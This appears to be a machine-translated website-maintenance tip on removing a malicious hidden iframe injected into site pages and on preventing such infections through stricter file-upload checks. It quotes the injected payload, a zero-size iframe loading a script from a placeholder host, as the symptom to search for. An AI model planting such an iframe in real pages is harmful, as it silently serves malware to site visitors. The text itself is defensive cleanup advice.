The page can be seen as
< ' IFRAME height=0 src= "http://www.xxx.com/1.js" frameborder=0 width=0 scrolling=no>
The solution to the problem
We can download the bulk replacement tool, replace the content blank, file format fill in *.*, check the inclusion of subfolders, if not previously backed up, you can also check the "replace before the backup file *.RPK."
Setup as shown:
You can also use DW software to replace this here without introducing it.
About the site poisoning hanging horse prevention measures
Website poisoning Reason:
Many sites need to use the file upload function, such as many sites need to publish product pictures and so on. The file upload function should have a strict qualification. For example: Only allow users to upload pictures such as jpg,gif. But because the program developers consider not rigorous, or directly call some common file upload components, resulting in the file upload is not strictly checked.
The solution is to find our components and then prohibit or do some security restrictions.